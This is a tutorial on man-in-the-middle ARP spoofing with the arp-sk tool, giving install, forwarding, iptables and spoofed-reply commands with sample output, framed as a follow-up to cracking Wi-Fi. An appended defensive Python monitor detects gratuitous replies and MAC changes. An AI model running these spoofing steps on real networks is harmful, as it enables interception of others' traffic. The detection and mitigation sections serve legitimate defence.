Practice using arp-spoofing

    In this article I will show how to use the arp-sk utility package on GNU/Linux to carry out a man-in-the-middle attack on the ARP protocol.

    Why such an attack is needed:
    There are many articles on Habr about, for example, cracking Wi-Fi. But what do you do once the key is cracked? Here is one of the options.

    Bit of theory

    ARP is required for transmission in an Ethernet environment, because frames are delivered by MAC address. Read more about MAC addresses on Wikipedia.
    For a message to get from one network device to another, in particular from Victim to Router, the computer needs to map the IP address to a MAC address. Let's watch this process with the tcpdump utility:
    # tcpdump -i eth1 -vvv
    21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has tell, length 28
    21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply is-at 00:50:ba:46:5d:92 (oui Unknown), length 46

    The first packet: the computer sends a broadcast message to find out which MAC address belongs to the IP address and asks that the reply be sent back to the requester. It is not visible here, but when sending this request the computer puts its own MAC address as the source and the broadcast MAC address (FF:FF:FF:FF:FF:FF) as the destination. Having received this packet, a network device should compare the requested IP address with its own and, if it matches, send the next packet.
    The second packet: the device with that address replies, from its own MAC address to the MAC address given in the request, that the address is at 00:50:ba:46:5d:92.

    Because the ARP request is sent to the broadcast address, it is received by everyone in the same broadcast segment as the sender. Hence one of the attack options: constantly send messages advertising your own MAC address. Then, when the victim computer sends an ARP request for the router, it immediately receives a reply from the attacker, and its traffic is sent to the attacker.

    Our task: to capture the Victim computer's traffic using the Attacker computer.
    For this we will use a gratuitous ARP reply. The ARP protocol allows a device to send an ARP request or reply even when no other device asked for it. What is this for? For example, when the router's MAC address has changed. If the computer accepts gratuitous ARP, it will overwrite the legitimate address with the attacker's address.

    Conducting an attack

    Installing the necessary software

    Arp-sk:
    # wget
    # tar xvzf arp-sk-0.0.16.tgz
    # cd arp-sk-0.0.16/
    # ./configure
    # make

    If the package compiled successfully, install it:
    # make install

    You can see the options for running the command with the following key:
    # arp-sk --help

    Usage: arp-sk
    -r --reply send an ARP reply

    -d --dst link-layer destination ()
    -s --src link-layer source ()

    -D --arp-dst destination in the ARP message ([hostname|hostip][:MAC])
    -S --arp-src source in the ARP message ([hostname|hostip][:MAC])

    -i --interface specify the interface (eth0)

    Address spoofing

    We must send ARP messages to both the router and the computer saying that the MAC address of the other device is ours.
    Before that, we configure the Attacker computer to forward traffic. First, enable forwarding in the kernel:
    # echo 1 > /proc/sys/net/ipv4/ip_forward
    Now allow forwarding in the packet filter. I use iptables, so I add accept rules to the FORWARD chain. Since I am working in a test network, I can add the following rules, which allow the attacking computer to forward traffic for the address:
    # iptables -I FORWARD 1 -s -j ACCEPT
    # iptables -I FORWARD 2 -d -j ACCEPT
    Attention! These rules are potentially dangerous, especially if you have several network interfaces. In that case I recommend using more precise rules.

    Let's look at the addresses. Our address:
    # ifconfig eth1 | grep HW
    eth1 Link encap:Ethernet HWaddr 00:13:CE:5C:11:34

    Addresses of the other devices:
    # arp -an
    ? ( at 00:50:ba:46:5d:92 [ether] on eth1
    ? ( at 00:1c:bf:41:53:4b [ether] on eth1

    Let's look at the routing table of the Victim computer. Now we send the following ARP packets to the devices, substituting our own MAC address for that of the other device. The first, sent to the router (00:50:ba:46:5d:92), says on behalf of the Victim that its MAC address is now 00:13:CE:5C:11:34; the second, sent to the Victim (00:1c:bf:41:53:4b), says on behalf of the router that its MAC address is now 00:13:CE:5C:11:34:
    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S -d 00:50:ba:46:5d:92 -D
    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S -d 00:1c:bf:41:53:4b -D

    We get the following output:
    + Initialization of the packet structure
    + Running mode "reply"
    + Ifname: eth1
    + Source MAC: 00:13:ce:5c:11:34
    + Source ARP MAC: 00:13:ce:5c:11:34
    + Source ARP IP :
    + Target MAC: 00:1c:bf:41:53:4b
    + Target ARP MAC: 00:1c:bf:41:53:4b
    + Target ARP IP :

    --- Start classical sending ---
    TS: 21:30:44.338540
    To: 00:1c:bf:41:53:4b From: 00:13:ce:5c:11:34 0x0806
    ARP For (00:1c:bf:41:53:4b): is at 00:13:ce:5c:11:34

    Now let's look at the Victim's ARP table. That is actually all: you can now run your favourite sniffer and capture the packets you need, for example a ping to Yandex. Addition: if a firewall is installed on the computer, it may display a message about spoofing.
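The firewall warning mentioned above is exactly the kind of check a defender can run on their own segment: the two tell-tale signs of this attack are an ARP reply that nobody requested (the gratuitous reply) and an IP address whose MAC mapping suddenly changes. The following monitor, an added example that is not part of the original article or the arp-sk project, parses tcpdump-style ARP lines such as the ones shown earlier and raises an alert on both signs. The sample lines, the 192.0.2.x addresses and the trusted-mapping parameter are constructed for the example; the MAC addresses are the ones from the article.

```python
import re

# Matches the two ARP line shapes tcpdump prints (with and without -vvv):
#   ... ARP, ..., Request who-has 192.0.2.1 tell 192.0.2.10, length 28
#   ... ARP, ..., Reply 192.0.2.1 is-at 00:50:ba:46:5d:92 (oui Unknown), length 46
ARP_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) ARP, .*?"
    r"(?:Request who-has (?P<req_ip>\S+) tell (?P<tell_ip>\S+)"
    r"|Reply (?P<rep_ip>\S+) is-at (?P<rep_mac>[0-9A-Fa-f:]{17}))"
)

# Constructed sample trace: a normal request/reply for the router, followed by
# two unsolicited replies that re-point both hosts at the attacker's MAC.
SAMPLE = [
    "21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 192.0.2.1 tell 192.0.2.10, length 28",
    "21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.0.2.1 is-at 00:50:ba:46:5d:92 (oui Unknown), length 46",
    "21:30:44.338540 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.0.2.1 is-at 00:13:ce:5c:11:34 (oui Unknown), length 46",
    "21:30:44.339001 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.0.2.10 is-at 00:13:ce:5c:11:34 (oui Unknown), length 46",
]


def parse_arp_line(line):
    """Return a dict describing one ARP request or reply, or None for other lines."""
    m = ARP_RE.search(line)
    if not m:
        return None
    if m.group("req_ip"):
        return {"ts": m.group("ts"), "kind": "request",
                "ip": m.group("req_ip"), "tell": m.group("tell_ip")}
    return {"ts": m.group("ts"), "kind": "reply",
            "ip": m.group("rep_ip"), "mac": m.group("rep_mac").lower()}


def analyze(lines, trusted=None):
    """Scan ARP lines and return a list of alerts.

    trusted (hypothetical parameter): an optional ip -> mac map of known-good
    bindings, e.g. the router, so a change is flagged even on the first reply.
    """
    seen = {ip: mac.lower() for ip, mac in (trusted or {}).items()}  # ip -> mac
    pending = set()   # IPs for which a request was seen and no reply yet
    alerts = []
    for line in lines:
        pkt = parse_arp_line(line)
        if pkt is None:
            continue
        if pkt["kind"] == "request":
            pending.add(pkt["ip"])
            continue
        ip, mac = pkt["ip"], pkt["mac"]
        # A reply with no outstanding request is a gratuitous reply.
        if ip in pending:
            pending.discard(ip)
        else:
            alerts.append({"alert": "unsolicited_reply", "ip": ip,
                           "mac": mac, "ts": pkt["ts"]})
        # The same IP advertised with a different MAC than before.
        if ip in seen and seen[ip] != mac:
            alerts.append({"alert": "mac_changed", "ip": ip, "mac": mac,
                           "expected": seen[ip], "ts": pkt["ts"]})
        seen.setdefault(ip, mac)
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE):
        print(a)
```

On a real host the script can read a live feed, for example `tcpdump -l -n -i eth1 arp` piped to it line by line, instead of the constructed SAMPLE. A gratuitous reply on its own is not necessarily malicious (legitimate hosts send one after an address change), so the `mac_changed` alert, especially against a trusted mapping for the router, is the stronger signal. Static ARP entries on critical hosts (`arp -s`) and Dynamic ARP Inspection on managed switches remove the attack surface rather than merely detecting its use.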



    This information is provided for reference only. The author reminds you of Article 272 of the Criminal Code of the Russian Federation, "Unlawful access to computer information".
